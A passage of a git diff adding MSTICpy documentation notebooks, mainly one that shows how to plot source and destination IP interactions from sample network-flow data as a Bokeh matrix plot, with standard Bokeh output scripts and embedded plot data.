fGqviAgAAAH2SURBVD6v0dGY9u7do1gspocPH8qyLI2M3JXH45HH49Gnx/6oK1euKRi8rI8OHtR8dl61Pp9++OHHpfJu9T99+kyRaFRHjhxWf39Q0uJuYywWK7s+AFiv+BMwgIrxxeefadu2bZKkZDKphoYGVVcvLmNdXYc0eP2G3t++XfPz8xodHdX4+LgymYzkkerr61VfXy9JsixL9+7dV0/Pcdf6x375Rb9vbtbvNm3SghYc5bLz2bLqA4D1ih1AAO+E5uZmhcNhfdLVpWQqpXgiIUnyeKT9nQGd7+3Vd6fPKJPJKBDoUDKVktfrda1vl9+v2NiYLly8pJaWFsdzr1MfAKwnnnw+v/DqYgCwtoLBy6tSz/Hjf1YkGtVGr1ex2Niq18cuIIBKQAAEYBTLsnTr9m19euzYuqwPAN4GAiAAAIBh+B9AAAAAwxAAAQAADEMABAAAMAwBEAAAwDAEQAAAAMMQAAEAAAxDAAQAADAMARAAAMAwBEAAAADDEAABAAAMQwAEAAAwDAEQAADAMARAAAAAwxAAAQAADEMABAAAMAwBEAAAwDAEQAAAAMMQAAEAAAxDAAQAADAMARAAAMAwBEAAAADDEAABAAAMQwAEAAAwDAEQAADAMARAAAAAwxAAAQAADEMABAAAMAwBEAAAwDAEQAAAAMP8H+oPLWTH44i/AAAAAElFTkSuQmCC\n",
+      "text/plain": [
+       "<IPython.core.display.Image object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "image_data = domain_utils.screenshot(\"secure-ssl-sec.com\")\n",
+    "with open('screenshot.png', 'wb') as f:\n",
+    "        f.write(image_data.content)\n",
+    "\n",
+    "display(Image(filename='screenshot.png'))"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "# Resources\n",
+    "## MSTICpy:\n",
+    "- msticpy Github https://github.com/Microsoft/msticpy\n",
+    "- msticpy Docs https://msticpy.readthedocs.io/en/latest/\n",
+    "- msticpy Release Blog https://medium.com/@msticmed\n",
+    "\n",
+    "## MSTICpy maintainers:\n",
+    "- Ian Hellen [@ianhellen](https://twitter.com/ianhellen)\n",
+    "- Pete Bryan [@MSSPete](https://twitter.com/MSSPete)\n",
+    "- Ashwin Patil [@ashwinpatil](https://twitter.com/ashwinpatil)\n",
+    "\n",
+    "## Other useful stuff:\n",
+    "- Azure Sentinel Github Notebooks https://github.com/Azure/Azure-Sentinel/Notebooks/tree/master\n",
+    "  - (Samples with data in Sample-Notebooks folder)\n",
+    "- Azure Sentinel Tech Community Blogs https://aka.ms/AzureSentinelBlog"
+   ]
+  }
+ ],
+ "metadata": {
+  "kernelspec": {
+   "display_name": "Python 3.6",
+   "language": "python",
+   "name": "python36"
+  },
+  "language_info": {
+   "codemirror_mode": {
+    "name": "ipython",
+    "version": 3
+   },
+   "file_extension": ".py",
+   "mimetype": "text/x-python",
+   "name": "python",
+   "nbconvert_exporter": "python",
+   "pygments_lexer": "ipython3",
+   "version": "3.6.7"
+  },
+  "widgets": {
+   "application/vnd.jupyter.widget-state+json": {
+    "state": {},
+    "version_major": 2,
+    "version_minor": 0
+   }
+  }
+ },
+ "nbformat": 4,
+ "nbformat_minor": 4
+}
diff --git a/docs/notebooks/MatrixPlot.ipynb b/docs/notebooks/MatrixPlot.ipynb
new file mode 100644
index 000000000..db14b738d
--- /dev/null
+++ b/docs/notebooks/MatrixPlot.ipynb
@@ -0,0 +1,1224 @@
+{
+ "cells": [
+  {
+   "cell_type": "markdown",
+   "source": [
+    "# MSTICPy - Matrix Plot\r\n",
+    "\r\n",
+    "This notebook demonstrates the use of the MSTICPy matrix visualization built using the [Bokeh library](https://bokeh.pydata.org).\r\n",
+    "\r\n",
+    "You must have msticpy installed:\r\n",
+    "```\r\n",
+    "%pip install --upgrade msticpy\r\n",
+    "```\r\n",
+    "\r\n",
+    "The matrix plot is designed to show interactions between two items stored\r\n",
+    "in a pandas DataFrame in a x-y grid.\r\n",
+    "\r\n",
+    "To take an example, if you have a DataFrame with source and destination IP addresses\r\n",
+    "(for example, a firewall log), you can plot the source IPs on the y axis and\r\n",
+    "destination IPs on the x axis. Where there is an event (row) that links a given\r\n",
+    "source and destination the matrix plot will plot a circle.\r\n",
+    "\r\n",
+    "By default the circle is proportional to the number of events containing a given\r\n",
+    "source/destination (x and y).\r\n",
+    "\r\n",
+    "The matrix plot also has the following variations:\r\n",
+    "- You can use a named column from the input data (e.g. bytes transmitted) to control\r\n",
+    "  the size of the plotted circle.\r\n",
+    "- You can invert the circle plot size, so that rarer interactions are shown\r\n",
+    "  with a large intersection point.\r\n",
+    "- You can plot just the presence of one or more interactions - this plots\r\n",
+    "  a fixed-size point and is useful if you only want to see the presence/\r\n",
+    "  absence of an interaction but don't care about the number of interactions.\r\n",
+    "- You can use a count of distinct values to control the size (e.g. you might\r\n",
+    "  specify \"protocol\" as the value column and want to see how many distinct\r\n",
+    "  protocols the source/destination interacted over).\r\n",
+    "- You can plot the log of any of the above counts/size - this is useful if\r\n",
+    "  the variance in the size is orders of magnitude.\r\n"
+   ],
+   "metadata": {}
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 1,
+   "source": [
+    "# Imports\r\n",
+    "\r\n",
+    "from msticpy.common.utility import check_py_version\r\n",
+    "MIN_REQ_PYTHON = (3,6)\r\n",
+    "check_py_version(MIN_REQ_PYTHON)\r\n",
+    "\r\n",
+    "import pandas as pd\r\n",
+    "\r\n",
+    "from msticpy import init_notebook\r\n",
+    "init_notebook(globals())\r\n"
+   ],
+   "outputs": [
+    {
+     "output_type": "display_data",
+     "data": {
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ],
+      "text/html": [
+       "<hr><h4>Starting Notebook initialization...</h4>"
+      ]
+     },
+     "metadata": {}
+    },
+    {
+     "output_type": "display_data",
+     "data": {
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ],
+      "text/html": [
+       "msticpy version installed: 1.3.1 latest published: 1.3.1<br>Latest version is installed.<br> <br>"
+      ]
+     },
+     "metadata": {}
+    },
+    {
+     "output_type": "display_data",
+     "data": {
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ],
+      "text/html": [
+       "Processing imports.... <br>"
+      ]
+     },
+     "metadata": {}
+    },
+    {
+     "output_type": "display_data",
+     "data": {
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ],
+      "text/html": [
+       "Imported: pd (pandas), IPython.get_ipython, IPython.display.display, IPython.display.HTML, IPython.display.Markdown, widgets (ipywidgets), pathlib.Path, plt (matplotlib.pyplot), matplotlib.MatplotlibDeprecationWarning, sns (seaborn), np (numpy), msticpy, msticpy.data.QueryProvider, msticpy.nbtools.foliummap.FoliumMap, msticpy.common.utility.md, msticpy.common.utility.md_warn, msticpy.common.wsconfig.WorkspaceConfig, msticpy.datamodel.pivot.Pivot, msticpy.datamodel.entities, msticpy.vis.mp_pandas_plot <br>"
+      ]
+     },
+     "metadata": {}
+    },
+    {
+     "output_type": "display_data",
+     "data": {
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ],
+      "text/html": [
+       "Checking configuration.... <br>"
+      ]
+     },
+     "metadata": {}
+    },
+    {
+     "output_type": "display_data",
+     "data": {
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ],
+      "text/html": [
+       "Setting notebook options.... <br>"
+      ]
+     },
+     "metadata": {}
+    },
+    {
+     "output_type": "display_data",
+     "data": {
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ],
+      "text/html": [
+       " <br>"
+      ]
+     },
+     "metadata": {}
+    },
+    {
+     "output_type": "display_data",
+     "data": {
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ],
+      "text/html": [
+       "<h4>Notebook initialization complete</h4>"
+      ]
+     },
+     "metadata": {}
+    },
+    {
+     "output_type": "execute_result",
+     "data": {
+      "text/plain": [
+       "True"
+      ]
+     },
+     "metadata": {},
+     "execution_count": 1
+    }
+   ],
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-01-30T20:46:28.835951Z",
+     "start_time": "2020-01-30T20:46:26.259919Z"
+    },
+    "scrolled": true
+   }
+  },
+  {
+   "cell_type": "markdown",
+   "source": [
+    "# Creating some sample data\r\n"
+   ],
+   "metadata": {}
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 2,
+   "source": [
+    "all_df = pd.read_csv(\r\n",
+    "        \"data/az_net_flows.csv\",\r\n",
+    "        index_col=0,\r\n",
+    "        parse_dates=[\r\n",
+    "            \"TimeGenerated\",\r\n",
+    "            \"FlowStartTime\",\r\n",
+    "            \"FlowEndTime\",\r\n",
+    "            \"FlowIntervalEndTime\",\r\n",
+    "        ],\r\n",
+    "    )\r\n",
+    "\r\n",
+    "# Create some sample data to work with\r\n",
+    "net_df = (\r\n",
+    "    all_df[[\"AllExtIPs\", \"L7Protocol\", \"TotalAllowedFlows\"]]\r\n",
+    "    .rename(columns={\"AllExtIPs\": \"SourceIP\"})\r\n",
+    "    .sample(100)\r\n",
+    ")\r\n",
+    "\r\n",
+    "\r\n",
+    "def get_dest_ip(row):\r\n",
+    "    dest_ip = None\r\n",
+    "    while dest_ip is None or row.SourceIP == dest_ip:\r\n",
+    "        dest_ip = net_df[~net_df[\"SourceIP\"].str.startswith(\"10.\")].sample(1)[\"SourceIP\"].values[0]\r\n",
+    "    return dest_ip\r\n",
+    "\r\n",
+    "net_df[\"DestinationIP\"] = net_df.apply(get_dest_ip, axis=1)\r\n",
+    "net_df.head(3)"
+   ],
+   "outputs": [
+    {
+     "output_type": "execute_result",
+     "data": {
+      "text/plain": [
+       "          SourceIP L7Protocol  TotalAllowedFlows  DestinationIP\n",
+       "690   20.38.98.100      https                1.0   65.55.44.109\n",
+       "544  13.67.143.117      https                1.0  13.71.172.130\n",
+       "957   65.55.163.76      https                5.0   13.65.107.32"
+      ],
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>SourceIP</th>\n",
+       "      <th>L7Protocol</th>\n",
+       "      <th>TotalAllowedFlows</th>\n",
+       "      <th>DestinationIP</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>690</th>\n",
+       "      <td>20.38.98.100</td>\n",
+       "      <td>https</td>\n",
+       "      <td>1.0</td>\n",
+       "      <td>65.55.44.109</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>544</th>\n",
+       "      <td>13.67.143.117</td>\n",
+       "      <td>https</td>\n",
+       "      <td>1.0</td>\n",
+       "      <td>13.71.172.130</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>957</th>\n",
+       "      <td>65.55.163.76</td>\n",
+       "      <td>https</td>\n",
+       "      <td>5.0</td>\n",
+       "      <td>13.65.107.32</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ]
+     },
+     "metadata": {},
+     "execution_count": 2
+    }
+   ],
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-01-30T20:46:28.957882Z",
+     "start_time": "2020-01-30T20:46:28.836950Z"
+    }
+   }
+  },
+  {
+   "cell_type": "markdown",
+   "source": [
+    "## The basic matrix/interaction plot\r\n",
+    "\r\n",
+    "The basic plot displays a circle at each interaction between the X and\r\n",
+    "Y axes items. The size of the circle is proportional to the number \r\n",
+    "of records/rows in which the X and Y parameter interact.\r\n",
+    "\r\n",
+    "Here we are using MSTICPy pandas accessor to plot the graph directly\r\n",
+    "from the DataFrame\r\n",
+    "\r\n",
+    "`data.mp_plot.matrix()`"
+   ],
+   "metadata": {}
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 3,
+   "source": [
+    "net_df.mp_plot.matrix(x=\"SourceIP\", y=\"DestinationIP\", title=\"IP Interaction\")"
+   ],
+   "outputs": [
+    {
+     "output_type": "display_data",
+     "data": {
+      "text/html": [
+       "\n",
+       "    <div class=\"bk-root\">\n",
+       "        <a href=\"https://bokeh.org\" target=\"_blank\" class=\"bk-logo bk-logo-small bk-logo-notebook\"></a>\n",
+       "        <span id=\"1002\">Loading BokehJS ...</span>\n",
+       "    </div>"
+      ]
+     },
+     "metadata": {}
+    },
+    {
+     "output_type": "display_data",
+     "data": {
+      "application/javascript": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  var JS_MIME_TYPE = 'application/javascript';\n  var HTML_MIME_TYPE = 'text/html';\n  var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n  var CLASS_NAME = 'output_bokeh rendered_html';\n\n  /**\n   * Render data to the DOM node\n   */\n  function render(props, node) {\n    var script = document.createElement(\"script\");\n    node.appendChild(script);\n  }\n\n  /**\n   * Handle when an output is cleared or removed\n   */\n  function handleClearOutput(event, handle) {\n    var cell = handle.cell;\n\n    var id = cell.output_area._bokeh_element_id;\n    var server_id = cell.output_area._bokeh_server_id;\n    // Clean up Bokeh references\n    if (id != null && id in Bokeh.index) {\n      Bokeh.index[id].model.document.clear();\n      delete Bokeh.index[id];\n    }\n\n    if (server_id !== undefined) {\n      // Clean up Bokeh references\n      var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n      cell.notebook.kernel.execute(cmd, {\n        iopub: {\n          output: function(msg) {\n            var id = msg.content.text.trim();\n            if (id in Bokeh.index) {\n              Bokeh.index[id].model.document.clear();\n              delete Bokeh.index[id];\n            }\n          }\n        }\n      });\n      // Destroy server and session\n      var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n      cell.notebook.kernel.execute(cmd);\n    }\n  }\n\n  /**\n   * Handle when a new output is added\n   */\n  function handleAddOutput(event, handle) {\n    var output_area = handle.output_area;\n    var output = handle.output;\n\n    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n    if ((output.output_type != \"display_data\") || (!Object.prototype.hasOwnProperty.call(output.data, EXEC_MIME_TYPE))) {\n      return\n    }\n\n    var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n\n    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n      // store reference to embed id on output_area\n      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n    }\n    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n      var bk_div = document.createElement(\"div\");\n      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n      var script_attrs = bk_div.children[0].attributes;\n      for (var i = 0; i < script_attrs.length; i++) {\n        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n        toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n      }\n      // store reference to server id on output_area\n      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n    }\n  }\n\n  function register_renderer(events, OutputArea) {\n\n    function append_mime(data, metadata, element) {\n      // create a DOM node to render to\n      var toinsert = this.create_output_subarea(\n        metadata,\n        CLASS_NAME,\n        EXEC_MIME_TYPE\n      );\n      this.keyboard_manager.register_events(toinsert);\n      // Render to node\n      var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n      render(props, toinsert[toinsert.length - 1]);\n      element.append(toinsert);\n      return toinsert\n    }\n\n    /* Handle when an output is cleared or removed */\n    events.on('clear_output.CodeCell', handleClearOutput);\n    events.on('delete.Cell', handleClearOutput);\n\n    /* Handle when a new output is added */\n    events.on('output_added.OutputArea', handleAddOutput);\n\n    /**\n     * Register the mime type and append_mime function with output_area\n     */\n    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n      /* Is output safe? */\n      safe: true,\n      /* Index of renderer in `output_area.display_order` */\n      index: 0\n    });\n  }\n\n  // register the mime type if in Jupyter Notebook environment and previously unregistered\n  if (root.Jupyter !== undefined) {\n    var events = require('base/js/events');\n    var OutputArea = require('notebook/js/outputarea').OutputArea;\n\n    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n      register_renderer(events, OutputArea);\n    }\n  }\n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(\"1002\");\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error(url) {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (let i = 0; i < css_urls.length; i++) {\n      const url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\": \"XypntL49z55iwGVUW4qsEu83zKL3XEcz0MjuGOQ9SlaaQ68X/g+k1FcioZi7oQAc\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\": \"bEsM86IHGDTLCS0Zod8a8WM6Y4+lafAL/eSiyQcuPzinmWNgNO2/olUF0Z2Dkn5i\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\": \"TX0gSQTdXTTeScqxj6PVQxTiRW8DOoGVwinyi1D3kxv7wuxQ02XkOxv0xwiypcAH\"};\n\n    for (let i = 0; i < js_urls.length; i++) {\n      const url = js_urls[i];\n      const element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.async = false;\n      element.src = url;\n      if (url in hashes) {\n        element.crossOrigin = \"anonymous\";\n        element.integrity = \"sha384-\" + hashes[url];\n      }\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\"];\n  var css_urls = [];\n  \n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (var i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    if (force === true) {\n        display_loaded();\n      }} else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(\"1002\")).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));",
+      "application/vnd.bokehjs_load.v0+json": ""
+     },
+     "metadata": {}
+    },
+    {
+     "output_type": "display_data",
+     "data": {
+      "text/html": [
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "  <div class=\"bk-root\" id=\"0ffe5812-238b-4500-9fbd-c6ddf970b799\" data-root-id=\"1004\"></div>\n"
+      ]
+     },
+     "metadata": {}
+    },
+    {
+     "output_type": "display_data",
+     "data": {
+      "application/vnd.bokehjs_exec.v0+json": "",
+      "application/javascript": "(function(root) {\n  function embed_document(root) {\n    \n  var docs_json = {\"4886a7c7-79bd-447a-b046-29ff5c453ce1\":{\"defs\":[],\"roots\":{\"references\":[{\"attributes\":{\"below\":[{\"id\":\"1015\"}],\"center\":[{\"id\":\"1017\"},{\"id\":\"1020\"}],\"height\":700,\"left\":[{\"id\":\"1018\"}],\"outline_line_color\":null,\"renderers\":[{\"id\":\"1038\"}],\"title\":{\"id\":\"1005\"},\"toolbar\":{\"id\":\"1027\"},\"toolbar_location\":\"above\",\"width\":900,\"x_range\":{\"id\":\"1007\"},\"x_scale\":{\"id\":\"1011\"},\"y_range\":{\"id\":\"1009\"},\"y_scale\":{\"id\":\"1013\"}},\"id\":\"1004\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{},\"id\":\"1021\",\"type\":\"WheelZoomTool\"},{\"attributes\":{},\"id\":\"1048\",\"type\":\"UnionRenderers\"},{\"attributes\":{},\"id\":\"1023\",\"type\":\"PanTool\"},{\"attributes\":{},\"id\":\"1025\",\"type\":\"SaveTool\"},{\"attributes\":{\"callback\":null,\"tooltips\":[[\"SourceIP\",\"@SourceIP\"],[\"DestinationIP\",\"@DestinationIP\"],[\"value\",\"@size\"]]},\"id\":\"1033\",\"type\":\"HoverTool\"},{\"attributes\":{\"bottom_units\":\"screen\",\"fill_alpha\":0.5,\"fill_color\":\"lightgrey\",\"left_units\":\"screen\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[4,4],\"line_width\":2,\"right_units\":\"screen\",\"syncable\":false,\"top_units\":\"screen\"},\"id\":\"1026\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"data_source\":{\"id\":\"1003\"},\"glyph\":{\"id\":\"1036\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1037\"},\"view\":{\"id\":\"1039\"}},\"id\":\"1038\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"data\":{\"DestinationIP\":[\"40.77.228.69\",\"52.168.138.145\",\"13.71.172.130\",\"40.91.75.5\",\"40.124.45.19\",\"13.71.172.128\",\"172.217.15.99\",\"20.38.98.100\",\"104.43.212.12\",\"13.71.172.128\",\"13.71.172.130\",\"40.124.45.19\",\"65.55.44.109\",\"65.55.44.109\",\"13.65.107.32\",\"40.124.45.19\",\"40.77.228.69\",\"52.165.170.112\",\"52.168.138.145\",\"72.21.81.200\",\"13.65.107.32\",\"40.124.45.19\",\"52.168.138.145\",\"65.55.44.109\",\"52.168.138.145\",\"40.124.45.19\",\"72.21.91.29\",\"72.21.81.200\",\"40.91.75.5\",\"13.71.172.130\",\"65.55.44.108\",\"65.55.44.109\",\"72.21.81.240\",\"65.55.44.109\",\"65.55.44.109\",\"65.55.44.109\",\"13.71.172.128\",\"40.77.232.95\",\"52.165.170.112\",\"65.55.44.109\",\"72.21.81.200\",\"72.21.91.29\",\"52.168.138.145\",\"13.67.143.117\",\"13.68.93.109\",\"13.71.172.128\",\"23.48.36.78\",\"52.165.170.112\",\"65.55.44.109\",\"20.38.98.100\",\"8.249.241.254\",\"40.77.228.69\",\"172.217.15.99\",\"13.67.143.117\",\"13.71.172.130\",\"40.124.45.19\",\"40.77.226.250\",\"52.239.152.10\",\"65.55.44.109\",\"90.130.70.73\",\"20.38.98.100\",\"65.55.44.109\",\"13.65.107.32\",\"13.67.143.117\",\"20.38.98.100\",\"13.67.143.117\",\"13.71.172.128\",\"13.71.172.130\",\"13.83.148.218\",\"20.38.98.100\",\"23.4.187.27\",\"40.124.45.19\",\"65.55.44.108\",\"72.21.81.200\",\"72.21.91.29\",\"99.84.104.63\",\"13.65.107.32\",\"40.124.45.19\",\"172.217.15.99\",\"8.249.241.254\",\"13.68.93.109\",\"40.77.228.69\",\"65.55.44.109\",\"52.168.138.145\",\"40.124.45.19\",\"157.55.134.136\"],\"SourceIP\":[\"10.0.3.5\",\"10.0.3.5\",\"104.43.212.12\",\"104.43.212.12\",\"13.107.4.50\",\"13.65.107.32\",\"13.65.107.32\",\"13.65.107.32\",\"13.67.143.117\",\"13.67.143.117\",\"13.67.143.117\",\"13.67.143.117\",\"13.67.143.117\",\"13.68.93.109\",\"13.71.172.128\",\"13.71.172.128\",\"13.71.172.128\",\"13.71.172.128\",\"13.71.172.128\",\"13.71.172.128\",\"13.71.172.130\",\"13.71.172.130\",\"13.71.172.130\",\"13.71.172.130\",\"13.83.148.218\",\"131.107.147.209\",\"157.55.134.136\",\"172.217.15.99\",\"172.217.8.14\",\"20.38.98.100\",\"20.38.98.100\",\"20.38.98.100\",\"20.38.98.100\",\"205.185.216.42\",\"23.4.187.27\",\"23.48.36.78\",\"40.124.45.19\",\"40.124.45.19\",\"40.124.45.19\",\"40.124.45.19\",\"40.124.45.19\",\"40.124.45.19\",\"40.77.226.250\",\"40.77.228.69\",\"40.77.228.69\",\"40.77.228.69\",\"40.77.228.69\",\"40.77.228.69\",\"40.77.228.69\",\"40.77.232.95\",\"40.77.232.95\",\"40.91.75.5\",\"52.165.170.112\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.239.152.10\",\"52.239.152.10\",\"65.55.163.76\",\"65.55.44.108\",\"65.55.44.108\",\"65.55.44.109\",\"65.55.44.109\",\"65.55.44.109\",\"65.55.44.109\",\"65.55.44.109\",\"65.55.44.109\",\"65.55.44.109\",\"65.55.44.109\",\"65.55.44.109\",\"65.55.44.109\",\"65.55.44.109\",\"72.21.81.200\",\"72.21.81.200\",\"72.21.81.240\",\"72.21.81.240\",\"72.21.91.29\",\"72.21.91.29\",\"72.21.91.29\",\"8.249.241.254\",\"90.130.70.73\",\"99.84.104.63\"],\"index\":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85],\"plt_size\":{\"__ndarray__\":\"AAAAAAAABEAAAAAAAAAEQAAAAAAAAARAAAAAAAAABEAAAAAAAAAEQAAAAAAAAARAAAAAAAAABEAAAAAAAAAUQAAAAAAAAARAAAAAAAAABEAAAAAAAAAEQAAAAAAAABRAAAAAAAAABEAAAAAAAAAEQAAAAAAAAARAAAAAAAAABEAAAAAAAAAeQAAAAAAAAARAAAAAAAAABEAAAAAAAAAEQAAAAAAAAARAAAAAAAAABEAAAAAAAAAEQAAAAAAAABRAAAAAAAAABEAAAAAAAAAEQAAAAAAAAARAAAAAAAAABEAAAAAAAAAEQAAAAAAAABRAAAAAAAAABEAAAAAAAAAEQAAAAAAAAARAAAAAAAAABEAAAAAAAAAEQAAAAAAAAARAAAAAAAAAFEAAAAAAAAAEQAAAAAAAAARAAAAAAAAAFEAAAAAAAAAEQAAAAAAAAARAAAAAAAAABEAAAAAAAAAEQAAAAAAAAARAAAAAAAAAFEAA